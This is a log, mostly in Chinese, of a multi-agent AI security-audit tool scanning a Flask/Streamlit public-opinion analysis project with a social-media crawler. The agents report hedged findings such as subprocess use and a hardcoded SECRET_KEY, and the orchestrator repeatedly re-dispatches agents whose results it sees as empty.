14:23:26
|
||||
Recon
|
||||
Thought: 从项目结构来看,这是一个包含多个组件的复杂项目,主要包括:
|
||||
1. MediaEngine - 一个Python模块,似乎处理媒体相关功能
|
||||
2. MindSpider - 包含爬虫功能,特别是DeepSentimentCrawling
|
||||
3. 根目录有一些Python应用文件,如app.py、config.py等
|
||||
4. 有Docker相关文件,表明这是一个容器化项目
|
||||
|
||||
我需要进一步了解技术栈和项目配置。首先,我应该查看根目录的配置文件,如requirements.txt、config.py和app.py,以了解主要的技术栈和入口点。
|
||||
14:23:34
|
||||
Completed: read_file
|
||||
Recon
|
||||
3ms
|
||||
Input:
|
||||
{
|
||||
"file_path": "requirements.txt"
|
||||
}
|
||||
|
||||
Output:
|
||||
null
|
||||
14:23:35
|
||||
Recon
|
||||
Thought: 从requirements.txt可以看出这是一个复杂的项目,使用了多种技术栈:
|
||||
1. Web框架:Flask、Streamlit、FastAPI
|
||||
2. 实时通信:Flask-SocketIO、python-socketio
|
||||
3. 数据库:MySQL、PostgreSQL、SQLite、Redis
|
||||
4. 爬虫工具:Playwright、BeautifulSoup等
|
||||
5. 机器学习:PyTorch、Transformers等
|
||||
6. 其他工具:OpenAI API、Tavily搜索等
|
||||
|
||||
现在我需要查看主要的入口点文件,如app.py,了解应用程序的主要结构和功能。
|
||||
14:23:38
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:23:39
|
||||
Recon
|
||||
Thought: 从app.py文件的前500行可以看出,这是一个Flask应用,用于统一管理三个Streamlit应用。它包含以下关键信息:
|
||||
|
||||
1. 使用Flask作为主框架,Flask-SocketIO用于实时通信
|
||||
2. 配置了多个API密钥和引擎(Insight Engine、Media Engine、Query Engine等)
|
||||
3. 使用MindSpider模块进行爬虫功能
|
||||
4. 尝试导入ReportEngine作为蓝图
|
||||
5. 配置了多个数据库连接参数
|
||||
|
||||
我需要继续查看app.py的其余部分,以了解完整的应用结构和入口点。同时,我也应该查看config.py文件来了解配置结构。
|
||||
14:23:44
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:23:44
|
||||
Recon
|
||||
Thought: 从app.py的501-1000行可以看出,这个应用管理多个Streamlit子进程:
|
||||
|
||||
1. 有四个主要进程:insight、media、query和forum
|
||||
2. 每个进程都有独立的端口(insight: 8501, media: 8502, query: 8503)
|
||||
3. 使用队列进行进程间通信
|
||||
4. 有日志记录功能,将输出写入文件并通过WebSocket发送到前端
|
||||
5. 有启动Streamlit应用的函数
|
||||
|
||||
我需要继续查看app.py的剩余部分,以了解完整的API路由和功能。同时,我也应该查看config.py文件来了解配置结构。
|
||||
14:23:48
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:23:49
|
||||
Recon
|
||||
Thought: 从app.py的最后部分可以看出,这个应用提供了多个API端点:
|
||||
|
||||
1. 日志相关API:读取和测试日志
|
||||
2. ForumEngine相关API:启动/停止论坛监控,获取论坛日志
|
||||
3. 搜索API:统一搜索接口,可以向运行中的不同引擎发送搜索请求
|
||||
4. 每个Streamlit应用都有对应的API端口(insight: 8601, media: 8602, query: 8603)
|
||||
|
||||
现在我需要查看config.py文件来了解配置结构,以及查看SingleEngineApp目录来了解各个引擎的实现。
|
||||
14:23:55
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:23:56
|
||||
Recon
|
||||
Thought: 从config.py文件可以看出,这是一个使用Pydantic Settings进行配置管理的项目,包含多个API密钥和配置项:
|
||||
|
||||
1. 数据库配置:支持MySQL和PostgreSQL
|
||||
2. 多个LLM引擎配置:Insight Engine、Media Engine、Query Engine、Report Engine等
|
||||
3. 网络工具配置:Tavily API、Bocha API等
|
||||
4. 每个引擎都有对应的API密钥、基础URL和模型名称
|
||||
|
||||
现在我需要查看SingleEngineApp目录,了解各个引擎的实现,以及查看MindSpider目录,了解爬虫功能的实现。
|
||||
14:24:02
|
||||
Completed: list_files
|
||||
Recon
|
||||
0ms
|
||||
14:24:03
|
||||
Recon
|
||||
Thought: SingleEngineApp目录包含三个Streamlit应用文件,分别对应三个不同的引擎:
|
||||
1. insight_engine_streamlit_app.py - 洞察引擎
|
||||
2. media_engine_streamlit_app.py - 媒体引擎
|
||||
3. query_engine_streamlit_app.py - 查询引擎
|
||||
|
||||
我需要查看这些文件来了解各个引擎的具体实现和功能。首先查看洞察引擎的实现。
|
||||
14:24:07
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:24:07
|
||||
Recon
|
||||
Thought: 从insight_engine_streamlit_app.py可以看出,这是一个Streamlit应用,为Insight Agent提供Web界面。主要功能包括:
|
||||
|
||||
1. 接收URL参数中的查询内容
|
||||
2. 使用DeepSearchAgent执行深度搜索和分析
|
||||
3. 生成报告结构并处理段落
|
||||
4. 执行反思循环以改进分析结果
|
||||
5. 生成最终报告
|
||||
|
||||
现在我需要查看媒体引擎和查询引擎的实现,以及MindSpider目录,了解爬虫功能的实现。
|
||||
14:24:12
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:26:02
|
||||
Recon
|
||||
Thought: 从media_engine_streamlit_app.py可以看出,这是Media Agent的Streamlit界面,主要功能包括:
|
||||
|
||||
1. 支持多模态能力,可以处理视频、图文、直播等内容
|
||||
2. 支持多种搜索引擎:BochaAPI和AnspireAPI
|
||||
3. 使用Gemini模型作为默认LLM
|
||||
4. 接收URL参数中的查询内容并自动执行搜索
|
||||
|
||||
现在我需要查看查询引擎的实现,以及MindSpider目录,了解爬虫功能的实现。
|
||||
14:26:07
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:26:10
|
||||
Recon
|
||||
Thought: 从query_engine_streamlit_app.py可以看出,这是Query Agent的Streamlit界面,主要功能包括:
|
||||
|
||||
1. 具备强大的网页搜索能力
|
||||
2. 注重国内外资源相结合理解舆情
|
||||
3. 使用DeepSeek模型作为默认LLM
|
||||
4. 使用Tavily API进行网络搜索
|
||||
5. 与Insight Agent类似,也执行报告结构生成、段落处理和反思循环
|
||||
|
||||
现在我需要查看MindSpider目录,了解爬虫功能的实现。
|
||||
14:26:14
|
||||
Completed: list_files
|
||||
Recon
|
||||
2ms
|
||||
14:26:14
|
||||
Recon
|
||||
Thought: MindSpider目录包含一个复杂的爬虫系统,主要结构包括:
|
||||
|
||||
1. DeepSentimentCrawling/MediaCrawler - 媒体爬虫模块
|
||||
- 包含缓存系统
|
||||
- 数据库模块
|
||||
- 代理系统
|
||||
- 各种工具函数
|
||||
- 主程序入口
|
||||
|
||||
2. DeepSentimentCrawling - 深度情感爬虫
|
||||
- 关键词管理器
|
||||
- 平台爬虫
|
||||
- 主程序
|
||||
|
||||
3. 根目录的MindSpider文件
|
||||
- 配置文件
|
||||
- 主程序
|
||||
|
||||
我需要查看MindSpider的主程序和配置文件,了解爬虫系统的整体架构和功能。
|
||||
14:26:18
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:26:20
|
||||
Recon
|
||||
Thought: 从MindSpider/main.py可以看出,这是一个AI爬虫项目的主程序,集成了两个核心模块:
|
||||
|
||||
1. BroadTopicExtraction - 广泛主题提取
|
||||
2. DeepSentimentCrawling - 深度情感爬虫
|
||||
|
||||
主要功能包括:
|
||||
- 检查配置和数据库连接
|
||||
- 初始化数据库
|
||||
- 运行爬虫任务
|
||||
- 支持多种数据库(MySQL、PostgreSQL)
|
||||
|
||||
现在我需要查看MindSpider的配置文件,了解具体的配置项。
|
||||
14:26:24
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:26:25
|
||||
Recon
|
||||
Thought: 从MindSpider/config.py可以看出,这是一个使用Pydantic Settings进行配置管理的模块,主要包含:
|
||||
|
||||
1. 数据库配置:支持MySQL和PostgreSQL
|
||||
2. MindSpider API配置:包括API密钥、基础URL和模型名称
|
||||
3. 使用.env文件进行环境变量管理
|
||||
|
||||
现在我需要查看DeepSentimentCrawling模块,了解爬虫的具体实现。
|
||||
14:26:29
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:27:09
|
||||
Recon
|
||||
Thought: 从DeepSentimentCrawling/main.py可以看出,这是一个深度情感爬取模块,主要功能包括:
|
||||
|
||||
1. 支持多个平台:小红书(xhs)、抖音(dy)、快手(ks)、哔哩哔哩(bili)、微博(wb)、贴吧(tieba)、知乎(zhihu)
|
||||
2. 基于关键词进行爬取
|
||||
3. 支持每日爬取任务和单个平台爬取
|
||||
4. 使用关键词管理器(KeywordManager)和平台爬虫(PlatformCrawler)
|
||||
|
||||
现在我需要查看平台爬虫的实现,了解具体的爬取逻辑。
|
||||
14:27:19
|
||||
Completed: read_file
|
||||
Recon
|
||||
3ms
|
||||
14:27:19
|
||||
✅ recon Agent 完成
|
||||
Orchestrator
|
||||
14:27:39
|
||||
Orchestrator
|
||||
Thought: Recon Agent 的执行结果没有返回任何有用的信息,项目结构、技术栈、入口点等都是空的。这可能是因为 Agent 需要更具体的指导。我将尝试一个更具体的 recon 任务,重点关注配置文件和主要代码文件,因为这些通常包含安全敏感信息。
|
||||
14:27:43
|
||||
📤 调度 recon Agent: 重点分析配置文件(config.py, .env.example)、主要入口文件(app.py, report_engine_only.py)和依赖文件(requirements.txt)...
|
||||
Orchestrator
|
||||
14:28:44
|
||||
Recon
|
||||
Thought: 我需要开始收集项目信息。首先,我应该了解项目的整体结构,包括目录布局和文件组织。这将帮助我识别项目类型、技术栈和关键组件。我将从根目录开始,递归列出所有文件和目录。
|
||||
14:28:51
|
||||
Completed: list_files
|
||||
Recon
|
||||
4ms
|
||||
14:28:51
|
||||
Recon
|
||||
Thought: 从文件列表中,我可以看到这是一个复杂的项目,包含多个组件:
|
||||
1. MediaEngine - 一个Python模块,似乎用于媒体处理和报告生成
|
||||
2. MindSpider/DeepSentimentCrawling - 一个网络爬虫项目,用于情感分析爬取
|
||||
3. 根目录有一些配置文件和主程序
|
||||
|
||||
我需要进一步了解项目的技术栈和依赖关系。首先,我应该查看根目录的配置文件,如requirements.txt、package.json等,以了解项目使用的依赖和技术栈。
|
||||
14:28:56
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:29:05
|
||||
Recon
|
||||
Thought: 从requirements.txt文件中,我可以看到这是一个复杂的项目,使用了多种技术栈:
|
||||
|
||||
1. Web框架:Flask、Streamlit、FastAPI
|
||||
2. 数据库:MySQL (pymysql, aiomysql)、SQLite (aiosqlite)、Redis、PostgreSQL (asyncpg)
|
||||
3. 爬虫工具:Playwright、BeautifulSoup、lxml等
|
||||
4. 机器学习:PyTorch、Transformers、scikit-learn等
|
||||
5. 其他工具:OpenAI API、数据处理、可视化等
|
||||
|
||||
现在我应该查看MindSpider/DeepSentimentCrawling目录下的package.json文件,以了解前端或Node.js相关的依赖。
|
||||
14:29:28
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:29:29
|
||||
Recon
|
||||
Thought: package.json文件显示这是一个使用VitePress的文档项目,没有前端应用依赖。现在我应该查看MindSpider/DeepSentimentCrawler目录下的requirements.txt文件,以了解爬虫组件的具体依赖。
|
||||
14:29:32
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:29:32
|
||||
Recon
|
||||
Thought: 现在我已经了解了项目的主要依赖。接下来,我应该查看主要的入口点文件,如app.py、main.py等,以了解应用程序的启动点和主要功能。首先查看根目录的app.py文件。
|
||||
14:29:35
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:29:35
|
||||
Recon
|
||||
Thought: app.py文件很长,我需要查看更多内容来了解应用程序的主要功能和入口点。让我继续读取文件的剩余部分。
|
||||
14:29:38
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:29:39
|
||||
Recon
|
||||
Thought: app.py文件非常长,我需要继续查看剩余部分以了解完整的应用程序结构。让我继续读取文件的最后部分。
|
||||
14:29:41
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:29:42
|
||||
Recon
|
||||
Thought: app.py文件很长,我已经看到了大部分内容,但还需要查看最后部分以了解完整的应用程序结构。让我继续读取文件的最后部分。
|
||||
14:29:43
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:29:46
|
||||
Recon
|
||||
Thought: 现在我已经了解了app.py文件的主要内容。这是一个Flask应用,用于管理多个Streamlit应用。接下来,我应该查看MindSpider/main.py文件,以了解爬虫组件的主要功能。
|
||||
14:29:51
|
||||
Completed: read_file
|
||||
Recon
|
||||
4ms
|
||||
14:29:53
|
||||
Recon
|
||||
Thought: MindSpider/main.py文件也很长,我需要查看更多内容来了解爬虫组件的主要功能。让我继续读取文件的剩余部分。
|
||||
14:29:55
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:29:56
|
||||
Recon
|
||||
Thought: 我已经了解了MindSpider/main.py文件的主要内容。这是一个爬虫项目的主程序,集成了BroadTopicExtraction和DeepSentimentCrawling两个核心模块。接下来,我应该查看配置文件,以了解项目的配置结构和敏感信息。
|
||||
14:29:59
|
||||
Completed: read_file
|
||||
Recon
|
||||
6ms
|
||||
Input:
|
||||
{
|
||||
"file_path": "config.py"
|
||||
}
|
||||
|
||||
Output:
|
||||
null
|
||||
14:30:03
|
||||
Recon
|
||||
Thought: config.py文件很长,我需要查看更多内容以了解完整的配置结构。让我继续读取文件的剩余部分。
|
||||
14:30:04
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:30:05
|
||||
Recon
|
||||
Thought: 现在我已经了解了config.py文件的主要内容。这是一个使用pydantic-settings管理的全局配置文件,包含了数据库配置、LLM API配置、网络工具配置等。接下来,我应该查看.env.example文件,以了解环境变量的配置示例。
|
||||
14:30:09
|
||||
Completed: read_file
|
||||
Recon
|
||||
1ms
|
||||
14:30:10
|
||||
Recon
|
||||
Thought: 现在我已经了解了项目的主要配置文件。接下来,我应该查看一些关键的入口点文件,如SingleEngineApp目录下的文件,以了解各个引擎的应用程序结构。首先查看SingleEngineApp目录结构。
|
||||
14:30:13
|
||||
Completed: list_files
|
||||
Recon
|
||||
1ms
|
||||
14:30:14
|
||||
Recon
|
||||
Thought: SingleEngineApp目录包含三个Streamlit应用程序文件。我应该查看其中一个文件以了解应用程序的结构和功能。让我先查看insight_engine_streamlit_app.py文件。
|
||||
14:30:17
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:30:17
|
||||
✅ recon Agent 完成
|
||||
Orchestrator
|
||||
14:30:17
|
||||
Orchestrator
|
||||
尝试直接分析项目中的关键文件,看看能否获取更多信息。我将尝试使用 analysis Agent 来分析项目中的主要文件,特别是配置文件和入口文件。
|
||||
14:30:20
|
||||
📤 调度 analysis Agent: 分析项目中的关键文件,包括config.py, app.py, report_engine_only.py等主要入口文件...
|
||||
Orchestrator
|
||||
14:30:26
|
||||
Analysis
|
||||
Thought: 我需要首先了解这个项目的结构和内容,以便制定合适的分析策略。由于项目信息有限,我不知道项目的具体语言和框架,所以我应该先探索项目结构,然后根据文件类型选择合适的分析工具。
|
||||
14:30:28
|
||||
Completed: list_files
|
||||
Analysis
|
||||
2ms
|
||||
14:30:50
|
||||
Analysis
|
||||
Thought: 从项目结构来看,这是一个Python项目,主要包含两个主要部分:MediaEngine和MindSpider。项目中有多个Python文件,包括配置文件、主程序文件和工具文件。我注意到有一些敏感文件如.env.example,可能包含配置信息。接下来我应该先查看主要的入口文件和配置文件,了解项目的基本功能,然后进行安全分析。
|
||||
14:30:57
|
||||
Completed: read_file
|
||||
Analysis
|
||||
4ms
|
||||
14:30:58
|
||||
Analysis
|
||||
Thought: 我已经看到了app.py文件的部分内容,这是一个Flask应用,用于管理三个Streamlit应用。我注意到一些安全相关信息:
|
||||
1. Flask应用的SECRET_KEY是硬编码的
|
||||
2. 有多个API密钥配置
|
||||
3. 使用了subprocess模块
|
||||
4. 有socketio通信
|
||||
|
||||
我需要继续查看app.py的其余部分,然后检查配置文件和其他关键文件。让我先读取app.py的剩余部分。
|
||||
14:31:02
|
||||
Completed: read_file
|
||||
Analysis
|
||||
2ms
|
||||
14:31:02
|
||||
Analysis
|
||||
Thought: 我已经看到了app.py的部分内容,这是一个Flask应用,用于管理多个Streamlit应用。我注意到一些潜在的安全问题:
|
||||
1. 硬编码的SECRET_KEY
|
||||
2. 使用subprocess模块启动子进程
|
||||
3. 文件操作可能存在路径遍历风险
|
||||
|
||||
让我继续查看配置文件,了解项目的配置情况,然后使用semgrep进行静态分析,这样可以更系统地发现潜在的安全问题。
|
||||
14:31:05
|
||||
Completed: read_file
|
||||
Analysis
|
||||
1ms
|
||||
14:31:18
|
||||
Analysis
|
||||
Thought: 我已经看到了config.py文件的部分内容,这是一个使用pydantic-settings的配置文件,包含多个API密钥和配置项。我注意到配置文件中有很多API密钥字段,这些如果被泄露会很危险。
|
||||
|
||||
现在我已经对项目有了基本了解,接下来我应该使用semgrep进行静态分析,这样可以系统地发现潜在的安全问题。semgrep可以检测多种漏洞类型,包括SQL注入、XSS、命令注入等。
|
||||
14:31:22
|
||||
Completed: semgrep_scan
|
||||
Analysis
|
||||
2406ms
|
||||
Input:
|
||||
{
|
||||
"rules": "auto",
|
||||
"max_results": 50
|
||||
}
|
||||
|
||||
Output:
|
||||
null
|
||||
14:31:27
|
||||
Analysis
|
||||
Thought: semgrep工具未安装,我需要使用其他工具进行安全分析。我可以使用pattern_match工具来检测常见的危险模式,或者使用bandit_scan(如果项目是Python的)。从项目结构来看,这是一个Python项目,所以我可以尝试使用bandit_scan。
|
||||
14:31:29
|
||||
Completed: bandit_scan
|
||||
Analysis
|
||||
4ms
|
||||
14:31:31
|
||||
Analysis
|
||||
Thought: 看来bandit工具也未安装。我需要使用其他方法进行安全分析。我可以使用pattern_match工具来检测常见的危险模式,或者使用search_code工具搜索特定的关键字。让我先使用pattern_match来检测一些常见的危险模式。
|
||||
|
||||
首先,我需要读取一些关键文件的内容,然后使用pattern_match进行分析。让我先读取MindSpider/main.py,因为从项目结构看,这似乎是一个主要组件。
|
||||
14:31:35
|
||||
Completed: read_file
|
||||
Analysis
|
||||
5ms
|
||||
14:31:57
|
||||
Analysis
|
||||
Thought: 我已经看到了MindSpider/main.py文件的部分内容,这是一个AI爬虫项目的主程序。我注意到一些潜在的安全问题:
|
||||
1. 使用了subprocess模块
|
||||
2. 数据库连接字符串构建
|
||||
3. 使用了pymysql和sqlalchemy进行数据库操作
|
||||
|
||||
让我继续读取这个文件的剩余部分,然后使用pattern_match工具来检测常见的危险模式。
|
||||
14:32:01
|
||||
Completed: read_file
|
||||
Analysis
|
||||
1ms
|
||||
14:32:03
|
||||
Analysis
|
||||
Thought: 我已经看到了MindSpider/main.py文件的更多内容,这个文件使用了subprocess模块来执行其他Python脚本,这可能是命令注入的风险点。现在让我使用pattern_match工具来检测常见的危险模式,包括SQL注入、命令注入、路径遍历等。
|
||||
14:32:41
|
||||
Completed: pattern_match
|
||||
Analysis
|
||||
4ms
|
||||
14:32:42
|
||||
Analysis
|
||||
Thought: pattern_match工具没有检测到已知的危险模式,但我注意到代码中使用了subprocess.run来执行命令,这仍然是一个潜在的安全风险。让我继续检查其他关键文件,特别是那些处理用户输入或执行外部命令的文件。
|
||||
|
||||
让我先检查MindSpider/DeepSentimentCrawling/main.py文件,因为从项目结构看,这似乎是另一个主要组件。
|
||||
14:32:46
|
||||
Completed: read_file
|
||||
Analysis
|
||||
2ms
|
||||
14:32:47
|
||||
Analysis
|
||||
Thought: 我已经看到了MindSpider/DeepSentimentCrawling/main.py文件的部分内容,这是一个爬虫模块。我注意到它使用了PlatformCrawler来执行爬取任务,这可能涉及网络请求。让我继续查看这个文件的剩余部分,然后检查platform_crawler.py文件,因为它可能包含更多的安全敏感代码。
|
||||
14:32:51
|
||||
Completed: read_file
|
||||
Analysis
|
||||
0ms
|
||||
14:32:52
|
||||
Analysis
|
||||
Thought: 我已经看到了MindSpider/DeepSentimentCrawling/main.py文件的完整内容,这是一个爬虫模块,它使用了PlatformCrawler来执行爬取任务。现在我需要检查platform_crawler.py文件,因为它可能包含更多的安全敏感代码,特别是网络请求和用户输入处理部分。
|
||||
14:32:55
|
||||
Completed: read_file
|
||||
Analysis
|
||||
1ms
|
||||
14:32:57
|
||||
Analysis
|
||||
Thought: 我已经看到了platform_crawler.py文件的部分内容,这个文件负责配置和调用MediaCrawler进行多平台爬取。我注意到一些潜在的安全问题:
|
||||
1. 使用subprocess模块执行外部命令
|
||||
2. 文件操作可能存在路径遍历风险
|
||||
3. 数据库配置信息被硬编码写入文件
|
||||
|
||||
让我继续查看这个文件的剩余部分,然后使用search_code工具搜索一些特定的危险模式,如eval、exec、subprocess等。
|
||||
14:33:01
|
||||
Completed: read_file
|
||||
Analysis
|
||||
20ms
|
||||
14:33:03
|
||||
Analysis
|
||||
Thought: 我已经看到了platform_crawler.py文件的更多内容,这个文件使用了subprocess.run来执行MediaCrawler的main.py脚本,这是一个潜在的安全风险。现在让我使用search_code工具搜索一些特定的危险模式,如eval、exec、subprocess等,以便更全面地发现潜在的安全问题。
|
||||
14:33:06
|
||||
Completed: search_code
|
||||
Analysis
|
||||
287ms
|
||||
14:33:07
|
||||
Analysis
|
||||
Thought: 我发现了多个使用subprocess的地方,这些是潜在的安全风险点。现在让我搜索其他危险模式,如eval、exec、query等,以便更全面地发现潜在的安全问题。
|
||||
14:33:10
|
||||
Completed: search_code
|
||||
Analysis
|
||||
200ms
|
||||
14:33:11
|
||||
Analysis
|
||||
Thought: 我发现了一些使用eval的地方,大多数是Playwright的page.evaluate方法,用于在浏览器中执行JavaScript代码。这些通常是安全的,因为它们是在浏览器上下文中执行的。现在让我搜索exec和其他潜在的危险模式。
|
||||
14:33:14
|
||||
Completed: search_code
|
||||
Analysis
|
||||
157ms
|
||||
14:33:16
|
||||
Analysis
|
||||
Thought: 我发现了一些使用exec的地方,大多数是数据库操作或执行外部命令。现在让我搜索query和其他潜在的危险模式,特别是SQL查询相关的代码。
|
||||
14:33:18
|
||||
Completed: search_code
|
||||
Analysis
|
||||
5ms
|
||||
14:33:20
|
||||
Analysis
|
||||
Thought: 我已经搜索了subprocess、eval、exec和query等关键字,发现了一些潜在的安全风险点。现在让我使用dataflow_analysis工具来分析一些关键的数据流,特别是用户输入如何流向可能危险的函数。
|
||||
14:33:27
|
||||
Completed: dataflow_analysis
|
||||
Analysis
|
||||
65427ms
|
||||
14:34:34
|
||||
Analysis
|
||||
让我继续分析其他潜在的安全风险点。我将检查一些关键的Python文件,看看是否有明显的安全问题。
|
||||
14:34:36
|
||||
Completed: read_file
|
||||
Analysis
|
||||
6ms
|
||||
14:34:38
|
||||
Analysis
|
||||
Thought: 我已经看到了keyword_manager.py文件的部分内容,这个文件负责管理关键词和数据库操作。我注意到它使用了SQLAlchemy进行数据库操作,并且使用了参数化查询,这有助于防止SQL注入。让我继续查看这个文件的剩余部分,然后检查其他可能存在安全问题的文件。
|
||||
14:34:42
|
||||
Completed: read_file
|
||||
Analysis
|
||||
2ms
|
||||
14:35:04
|
||||
Analysis
|
||||
Thought: 我已经看到了keyword_manager.py文件的完整内容,这个文件使用了SQLAlchemy进行数据库操作,并且使用了参数化查询,这有助于防止SQL注入。现在让我检查.env.example文件,看看是否有敏感信息泄露的风险。
|
||||
14:35:07
|
||||
Completed: read_file
|
||||
Analysis
|
||||
5ms
|
||||
14:35:09
|
||||
Analysis
|
||||
Thought: 我已经看到了.env.example文件,这是一个环境变量配置示例文件,包含了各种API密钥和配置项。这个文件本身不包含敏感信息,因为它只是示例,但需要注意在实际使用时,.env文件可能包含敏感信息。
|
||||
|
||||
现在让我使用gitleaks_scan工具来检查代码中是否有密钥泄露或其他敏感信息。
|
||||
14:35:12
|
||||
Completed: gitleaks_scan
|
||||
Analysis
|
||||
73ms
|
||||
14:35:18
|
||||
Analysis
|
||||
Thought: 由于gitleaks工具未安装,我无法使用它来检测密钥泄露。让我使用search_code工具搜索一些常见的敏感信息模式,如API密钥、密码等。
|
||||
14:35:20
|
||||
Completed: search_code
|
||||
Analysis
|
||||
31ms
|
||||
14:35:22
|
||||
Analysis
|
||||
Thought: 我已经搜索了api_key关键字,发现了很多API密钥的配置。这些API密钥是通过环境变量或配置文件管理的,这是好的做法。现在让我搜索一些其他可能的敏感信息,如密码、密钥等。
|
||||
14:35:25
|
||||
Completed: search_code
|
||||
Analysis
|
||||
460ms
|
||||
14:35:27
|
||||
Analysis
|
||||
Thought: 我已经搜索了password关键字,发现了很多数据库密码的配置。这些密码是通过环境变量或配置文件管理的,这是好的做法。现在让我总结一下我的分析结果,并提供一个安全漏洞报告。
|
||||
|
||||
基于我的分析,我发现了以下潜在的安全问题:
|
||||
|
||||
1. 使用subprocess执行外部命令 - 在多个文件中发现
|
||||
2. 硬编码的SECRET_KEY - 在app.py中
|
||||
3. 数据库配置信息被硬编码写入文件 - 在platform_crawler.py中
|
||||
4. 使用Playwright的page.evaluate执行JavaScript代码 - 在多个爬虫客户端中
|
||||
|
||||
让我使用think工具来总结我的分析结果。
|
||||
14:35:44
|
||||
Completed: think
|
||||
Analysis
|
||||
0ms
|
||||
14:35:54
|
||||
Analysis
|
||||
Thought: 基于我的分析,我现在可以提供一个完整的安全漏洞报告。我将使用Final Answer格式来总结我的发现。
|
||||
14:36:51
|
||||
Analysis
|
||||
Thought: 我需要使用正确的工具格式来输出我的分析结果。让我使用think工具来总结我的分析,然后提供最终的安全漏洞报告。
|
||||
14:37:02
|
||||
Completed: think
|
||||
Analysis
|
||||
0ms
|
||||
14:37:05
|
||||
Analysis
|
||||
Thought: 我已经完成了对项目的安全分析,并记录了我的评估结果。现在我将使用reflect工具来总结我的分析进展和发现。
|
||||
14:37:26
|
||||
Completed: reflect
|
||||
Analysis
|
||||
165ms
|
||||
14:37:35
|
||||
Analysis
|
||||
Thought: 我已经完成了对项目的安全分析,并记录了我的发现和评估。现在我将总结我的分析结果,并提供一个完整的安全漏洞报告。
|
||||
|
||||
基于我的分析,我发现了以下潜在的安全问题:
|
||||
|
||||
1. **命令注入风险**:在多个文件中使用subprocess.run执行外部命令,包括app.py、MindSpider/main.py和platform_crawler.py。虽然当前命令参数是硬编码的,但如果未来修改为接受用户输入,可能存在命令注入风险。
|
||||
|
||||
2. **硬编码的SECRET_KEY**:在app.py第36行,Flask应用的SECRET_KEY是硬编码的,这降低了密钥的安全性。
|
||||
|
||||
3. **数据库配置信息硬编码写入文件**:在platform_crawler.py中,数据库配置信息被硬编码写入MediaCrawler的配置文件中,这可能导致敏感信息泄露。
|
||||
|
||||
4. **JavaScript代码执行**:在多个爬虫客户端中使用Playwright的page.evaluate方法执行JavaScript代码,虽然这些通常是在浏览器上下文中执行的,但如果用户输入被不当处理,可能存在XSS风险。
|
||||
|
||||
总体而言,项目在敏感信息管理方面做得较好,使用了参数化查询防止SQL注入,但需要注意subprocess使用和硬编码密钥的问题。
|
||||
14:37:51
|
||||
Analysis
|
||||
Action
|
||||
14:37:59
|
||||
Completed: think
|
||||
Analysis
|
||||
19ms
|
||||
14:37:59
|
||||
✅ analysis Agent 完成
|
||||
Orchestrator
|
||||
14:38:00
|
||||
Orchestrator
|
||||
Thought: analysis Agent 也没有返回任何有用的信息。这可能是因为项目文件结构复杂,或者 Agent 需要更具体的指导。我将尝试一个更直接的方法,先查看项目的根目录文件,特别是配置文件和主要入口文件,然后再进行深入分析。
|
||||
14:38:05
|
||||
📤 调度 recon Agent: 查看项目根目录下的所有文件,特别关注config.py, app.py, report_engine_only.py, requirements.txt等关键文件...
|
||||
Orchestrator
|
||||
14:38:15
|
||||
Recon
|
||||
Thought: 我需要开始收集项目信息。首先,我应该了解项目的整体结构,包括目录布局和主要文件。这将帮助我识别项目类型、技术栈和可能的入口点。我将从列出根目录开始。
|
||||
14:38:38
|
||||
Completed: list_files
|
||||
Recon
|
||||
15ms
|
||||
14:38:39
|
||||
Recon
|
||||
Thought: 从文件列表中,我可以看到这是一个包含多个组件的项目,主要有:
|
||||
1. MediaEngine - 一个Python模块,包含LLM相关功能
|
||||
2. MindSpider - 一个爬虫项目,包含DeepSentimentCrawling组件
|
||||
3. 一些根级别的Python文件如app.py, config.py等
|
||||
|
||||
我需要进一步了解项目的技术栈和结构。首先,我应该查看根目录下的配置文件,如requirements.txt、package.json等,以了解项目依赖和使用的框架。
|
||||
14:38:44
|
||||
Completed: read_file
|
||||
Recon
|
||||
0ms
|
||||
14:38:45
|
||||
Recon
|
||||
Thought: 从requirements.txt文件中,我可以看到这是一个舆情分析系统,使用了多种技术栈:
|
||||
1. Web框架:Flask, FastAPI, Streamlit
|
||||
2. 数据库:MySQL, PostgreSQL, SQLite, Redis
|
||||
3. 爬虫技术:Playwright, BeautifulSoup等
|
||||
4. LLM集成:OpenAI API
|
||||
5. 数据处理:pandas, numpy等
|
||||
|
||||
现在我需要查看MindSpider/DeepSentimentCrawling/MediaCrawler目录下的package.json文件,以了解前端依赖。
|
||||
14:38:51
|
||||
Completed: read_file
|
||||
Recon
|
||||
8ms
|
||||
14:38:52
|
||||
Recon
|
||||
Thought: package.json文件显示这是一个使用VitePress的文档项目,没有前端应用依赖。现在我需要查看主要的入口点文件,如app.py、MindSpider/main.py等,以了解应用程序的入口点和主要功能。
|
||||
14:38:55
|
||||
Completed: read_file
|
||||
Recon
|
||||
3ms
|
||||
14:38:57
|
||||
Recon
|
||||
Thought: app.py文件很长,我需要继续查看更多内容来了解应用程序的主要功能和入口点。让我继续读取文件的剩余部分。
|
||||
14:39:20
|
||||
Completed: read_file
|
||||
Recon
|
||||
2ms
|
||||
14:39:21
|
||||
Recon
|
||||
Thought: 我需要继续查看app.py文件的更多内容,特别是路由定义部分,以了解应用程序的API端点。让我继续读取文件的后续部分。
|
||||
14:39:24
|
||||
Completed: read_file
